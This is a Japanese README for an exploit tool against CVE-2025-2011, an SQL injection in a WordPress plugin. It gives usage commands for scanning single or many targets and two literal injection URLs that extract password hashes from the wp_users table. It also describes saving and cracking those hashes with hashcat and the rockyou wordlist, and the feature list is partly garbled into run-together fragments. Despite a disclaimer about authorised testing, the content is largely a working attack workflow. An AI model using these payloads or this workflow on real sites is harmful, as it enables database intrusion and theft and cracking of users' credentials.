
CVE-2025-2011 用エクスプロイト
作者: X3RX3S しかし、Ash Wesker に堂々とパクられました。彼は自分のバナーを付けて私のコードを GPT で書き換えたのです ;) こちらをご覧ください ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 '彼の'コードには私のハンドル名さえ残っています -_-'
目的: WordPress サイトに対する SQL インジェクションの脆弱性(CVE-2025-2011)をテストするための概念実証(PoC)ツールです。
免責事項: 自分が所有するシステム、またはテストするための明示的な書面による許可を得たシステムに対してのみ使用してください。無許可のテストは違法であり、非倫理的です。

-p 1 または -p 2 で選択可能)$2a$、$2b$、$2y$)ハッシュの検出($wp$ プレフィックス付きの亜種を含む)results_<hostname>.txt-m 3200)をプロンプト付きで任意に利用可能-u)またはファイル経由の複数ターゲット(-f)に対応requestscolorama依存関係のインストール:
pip install requests colorama
任意(クラッキング用):
hashcat がインストールされ、PATH に含まれていること(デフォルトは /usr/share/wordlists/rockyou.txt)/usr/share/wordlists/rockyou.txt などのワードリストスクリプトを実行可能にする(任意):
chmod +x CVE-2025-2011.py
単一ターゲット(デフォルトはペイロード 1):
python3 CVE-2025-2011.py -u https://example.com
単一ターゲット(ペイロード 2):
python3 CVE-2025-2011.py -u https://example.com -p 2
ファイルからの複数ターゲット(1 行に 1 URL):
python3 CVE-2025-2011.py -f targets.txt
テストした各ホストについて、スクリプトは結果ファイルを保存します:
results_<hostname>.txt
bcrypt ハッシュが見つかった場合、それらは hashes.txt に保存され、Hashcat でクラックするかどうかを尋ねるプロンプトが表示されます。スクリプトが使用する Hashcat コマンドの例:
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
注: bcrypt は設計上遅いため、クラッキングには非常に長い時間がかかり、GPU が必要になる場合があります。
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x
このツールは教育および防御目的でのみ提供されています。明示的な許可がないシステムに対して使用しないでください。作者および配布者は、不正使用について一切の責任を負いません。所有していないターゲットに対してテストを実行する前に、必ず書面による許可を取得してください。
run_hashcat 関数を更新して、お好みのリストを参照するようにしてください。